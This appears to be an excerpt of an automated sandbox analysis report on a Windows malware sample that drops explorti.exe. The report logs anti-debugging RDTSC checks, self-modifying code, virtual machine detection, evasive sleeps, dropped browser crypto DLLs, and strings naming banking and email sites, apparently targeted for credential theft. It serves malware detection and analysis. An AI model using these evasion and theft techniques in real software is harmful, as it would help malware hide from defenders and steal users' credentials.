Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AC0832 second address: 4AC0836 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AC0836 second address: 4AC0859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b movzx esi, dx 0x0000000e popad 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F3460CF07FCh 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AC0859 second address: 4AC0868 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460BFB96Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Special instruction interceptor: First address: 101CDF7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Special instruction interceptor: First address: E7C186 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Special instruction interceptor: First address: 104BEE7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Special instruction interceptor: First address: 102743C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Special instruction interceptor: First address: E7E849 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: BECDF7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: A4C186 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: C1BEE7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: BF743C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: A4E849 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Code function: 17_2_04AC07E0 rdtsc 17_2_04AC07E0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 7614 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 2386 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: foregroundWindowGot 409 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1015 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 890 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1048 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 467 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1001 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mozglue[1].dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\file.exe API coverage: 0.7 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 4636 Thread sleep count: 267 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8160 Thread sleep count: 1015 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8160 Thread sleep time: -2031015s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8164 Thread sleep count: 890 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8164 Thread sleep time: -1780890s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8144 Thread sleep count: 1048 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8144 Thread sleep time: -2097048s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8124 Thread sleep count: 467 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8124 Thread sleep time: -14010000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3964 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8140 Thread sleep count: 1001 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8140 Thread sleep time: -2003001s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDBC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6CDBC930
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.1436568097.0000000001B26000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: EBAEBFII.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.15.dr Binary or memory string: vmci.sys
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: EBAEBFII.0.dr Binary or memory string: global block list test formVMware20,11696492231
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: vmware
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: EBAEBFII.0.dr Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: explorti.exe, 00000013.00000002.3725431157.0000000001460000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWHvJ
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.15.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.15.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.15.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.15.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.15.dr Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: EBAEBFII.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: EBAEBFII.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: explorti.exe, explorti.exe, 0000001B.00000002.3284119133.0000000000BD0000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: EBAEBFII.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: Amcache.hve.15.dr Binary or memory string: VMware Virtual USB Mouse
Source: EBAEBFII.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: EBAEBFII.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: Amcache.hve.15.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: EBAEBFII.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: EBAEBFII.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Hyper-V (guest)
Source: Amcache.hve.15.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: EBAEBFII.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: Amcache.hve.15.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.15.dr Binary or memory string: \driver\vmci,\driver\pci
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000C8C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ~VirtualMachineTypes
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000C8C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.1433619231.0000000000C8C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: JDGCFBAFBF.exe, 00000011.00000002.1481376835.0000000001000000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, 00000013.00000002.3712567033.0000000000BD0000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 00000017.00000002.2078852195.0000000000BD0000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 00000019.00000002.2683042568.0000000000BD0000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000001B.00000002.3284119133.0000000000BD0000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: EBAEBFII.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Hyper-V
Source: Amcache.hve.15.dr Binary or memory string: VMware
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: EBAEBFII.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: EBAEBFII.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: EBAEBFII.0.dr Binary or memory string: outlook.office.comVMware20,11696492231s
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: EBAEBFII.0.dr Binary or memory string: AMC password management pageVMware20,11696492231
Source: Amcache.hve.15.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: EBAEBFII.0.dr Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: EBAEBFII.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.1436568097.0000000001B77000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000013.00000002.3725431157.00000000014A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: EBAEBFII.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: EBAEBFII.0.dr Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.15.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: EBAEBFII.0.dr Binary or memory string: discord.comVMware20,11696492231f
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: EBAEBFII.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: EBAEBFII.0.dr Binary or memory string: tasks.office.comVMware20,11696492231o
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.15.dr Binary or memory string: VMware20,1
Source: Amcache.hve.15.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.15.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.15.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: file.exe, 00000000.00000002.1436568097.0000000001B26000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: EBAEBFII.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.15.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: EBAEBFII.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: Amcache.hve.15.dr Binary or memory string: VMware VMCI Bus Device
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
